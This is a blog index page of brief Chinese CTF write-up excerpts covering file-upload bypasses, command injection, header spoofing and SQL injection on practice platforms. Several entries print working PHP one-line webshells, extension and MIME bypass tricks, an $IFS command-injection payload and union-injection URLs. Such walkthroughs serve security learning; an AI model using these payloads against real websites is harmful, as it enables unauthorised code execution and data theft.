![](https://img-blog.csdnimg.cn/20201014180756922.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
CTF
xinjuun
这个作者很懒,什么都没留下…
展开
-
Upload labs
Pass -01(js检查)题目基于前端js过滤,只能上传图片格式的文件,所以我们用一句话木马,改后缀上传后,用burp抓包,修改文件后缀为php,然后用蚁剑连接,注意:文件没有上传在具体题目中的文件夹中,所以我们在用蚁剑连接的时候,需要注意其地址Pass -02(只验证Content-type)根据源代码我们可以发现,这一关是常见验证中的文件类型验证,也就是验证MIME信息所以这里可以直接上传php文件,然后用burp抓包,修改content-type为图片类型:image/jpeg、ima原创 2022-04-24 00:30:30 · 1293 阅读 · 0 评论 -
极客大挑战 2019 Upload 1
还是文件上传得题,上传有一句话木马写的且改后缀为jpg得文件,会出现提示说文件包含`<?传不了,所以修改木马为:GIF89a? <script language="php">eval($_REQUEST[123])</script>打开burp,抓包修改文件后缀,发现php上传不了,常规文件后缀为:php2, php3, php4, php5, phps, pht, phtm, phtml这里修改后缀为:phtml可正常上传但上传后没有返回图片保存地址,一般上原创 2022-04-20 22:42:47 · 2472 阅读 · 0 评论 -
ACTF2020 新生赛 Upload 1
打开网页发现是个文件上传的页面,试着上传php文件,发现不行后,尝试burp抓包,修改文件后缀,进行前端绕过,发现可行。具体步骤如下:1、书写一句话木马,例如:eval和assert:php任意代码执行的一句话后门,我们喜欢用的是传统的eval,php5,7通用。<?php @eval($_GET["cmd"]); ?> <?php @assert($_POST['a']) ?>create_function和preg_replace函数:create_func原创 2022-04-20 22:13:23 · 3876 阅读 · 0 评论 -
GXYCTF2019 Ping Ping Ping 1
解题步骤:1,尝试用输入一个正确的IP地址2,发现是linux系统下的网站,尝试用|和ls查看目录,列出文件3,尝试查看flag文件,发现不能直接打开,且空格被过滤,原因:关键字被过滤4,找到被过滤字符名单,尝试打开index.php文件,发现过滤字符列表5,尝试绕过代码中有个 $a 考虑进行变量覆盖,构造如下 payload?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php?ip=127.0.0.1;a=g,cat$IFS$1fla$a.php或者另外一种方原创 2022-04-17 23:51:39 · 1376 阅读 · 0 评论 -
极客大挑战 2019 Http 1
打开网站,打开源代码,会发现一个secret.php的东西,然后打开,会发现说不是https://www.Sycsecret.com这个网址来的,所以打开burp,修改referer头,在repeater里面尝试,会发现说不是Syclover这个浏览器,所以修改浏览器信息,然后再send,发现说必须本地打开才行,所以添加X Forwarded-For,改为:X-Forwarded-For:127.0.0.1或者X-Forwarded-For:localhost然后send就会返回flag总结:考原创 2022-04-17 23:50:03 · 384 阅读 · 0 评论 -
极客大挑战 2019 Knife 1
发现是一句话木马,使用蚁剑连接,在根目录下找到flag文件或者是用post提交方式,提交参数Syc=system('cat /flag');总结:eavl函数的作用,所有的字符串放入到eval当中,eval会把字符串解析为php代码来进行执行,那么结合$_POST[‘Syc’]的话,只要使用post传输时在name为Syc的值中写入任何字符串,都可以当做php代码来执行。...原创 2022-04-17 21:24:36 · 534 阅读 · 0 评论 -
[SUCTF 2019]EasySQL 1(堆叠注入)
个人比较菜,自己尝试了一会,就直接看wp了解题过程:1:利用其没过滤*,直接用*,1来注入,直接得到flag不过需要从报错中猜到其sql语句select $_GET['query'] || flag from Flag,其拼接语句是:select *,1||flag from Flag,这句话的意思是,当1为真的时候,直接查询1from flag,这句话的意思是:执行这条查询语句会将表中的所有数据查询出来并且在后面增加一列列名和内容都是1的列,因为后端是只有一个Flag的表,表里只有一个字段flag原创 2022-04-16 21:34:28 · 266 阅读 · 0 评论 -
[极客大挑战 2019]BabySQL 1
练习阶段,所以当自己试了union等自己所知道的注入方法没做出来后,就直接看了wp其过滤了过滤 select or and union from password等关键词所以用双写绕过(思考:是只能用双写绕过吗?不能用大小写、双写关键词、编码等绕过?)剩下的就是常规的联合注入了:所用代码如下:http://c2647597-2468-4ccb-94e0-3ffd5876387d.node4.buuoj.cn:81/check.php?username=admin&password=admi原创 2022-04-16 21:33:48 · 79 阅读 · 0 评论 -
[极客大挑战 2019]Secret File
查看源码,发现有一个 achieve_room.php,打开burp,抓包,发现其有一个隐藏的回应 secr3t.phphttp://775fc2bb-8c0b-479c-ad02-65fecd0225ed.node4.buuoj.cn:81/secr3t.php打开php如图:试着直接打开flag.php,发现没有,然后看wp说可以用php伪协议来读取flag.php构造playload:http://775fc2bb-8c0b-479c-ad02-65fecd0225ed.node4.b原创 2022-04-16 21:33:18 · 66 阅读 · 0 评论 -
[GXYCTF2019]BabySQli
先用了一些自己知道的弱口令之类的试了一下,显而易见,没做出来,然后看了大佬们的wp先用UserName=admin&password=1,出现提示:查看网页源代码,发现一串加密过的字符串,经过base32解密,又经过base64解密后,得到:select * from user where username = ‘$name’这个提示告诉了他只去select了username;然后我们可以运用union的特点在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。copy的别原创 2022-04-16 21:32:06 · 143 阅读 · 0 评论 -
墨者 SQL手工注入漏洞测试(MySQL数据库)
测试注入点http://124.70.64.48:40014/new_list.php?id=1sdaf不显示,说明存在注入点order byhttp://124.70.64.48:40014/new_list.php?id=1%20order%20by%205报错猜解准备http://124.70.64.48:40014/new_list.php?id=-1%20union%20select%201,2,3,4查询信息(联合注入)(注意 id=后面需要用个错误的值,如-.原创 2022-04-04 22:25:01 · 1885 阅读 · 0 评论 -
ctf (bugku) 恋爱的魅力(哈哈,自己取的名字)(原名:社工进阶搜集)
开局一张图,答案全靠蒙,,,,看的我一脸懵逼,这是个啥?让我这个没npy的菜b知道了我找不到npy的原因了,我要加油!我也想要npy啊!!!好,我们开始看图,这里要找小美的的小区地址,首先我们看见的是一个塔,好吧,完全不知道这个什么塔(原谅我的无知,,,),看评论之后知道了它是西安的著名景点—大雁塔,额,完全不知道的好吧,,,评论上说也可以用百度搜图,也可以搜出来,然后我试了一下,就没有然后了,,,好,接下来我们打开百度地图,搜索大雁塔,我们就能找到它,找了一下它周围的地铁站,是大雁塔站,然后再原创 2021-07-26 18:20:57 · 795 阅读 · 2 评论 -
ctf (bugku)(0和1的故事)
身为小白的我,开始看见题目就头皮发麻,先是看评论,知道这个东西要搞成二维码,但问题来了,小白不会脚本,然后就老实的用excel做吧,再然后发现怎么也不能直接把数字直接粘贴到excel的每一个表格中,再然后就是搜教程,分列,再定位填充等等,然后再到ps上拼上定位角。 下面就开始讲讲我的心酸历程。 这个是下载后的txt文件截图(0和1看的头晕),文件在最后,有兴趣的大佬可以自己试试。然后复制粘贴到excel(巨麻烦)1、该单元格格式,把它改成文...原创 2021-07-24 12:56:13 · 3802 阅读 · 6 评论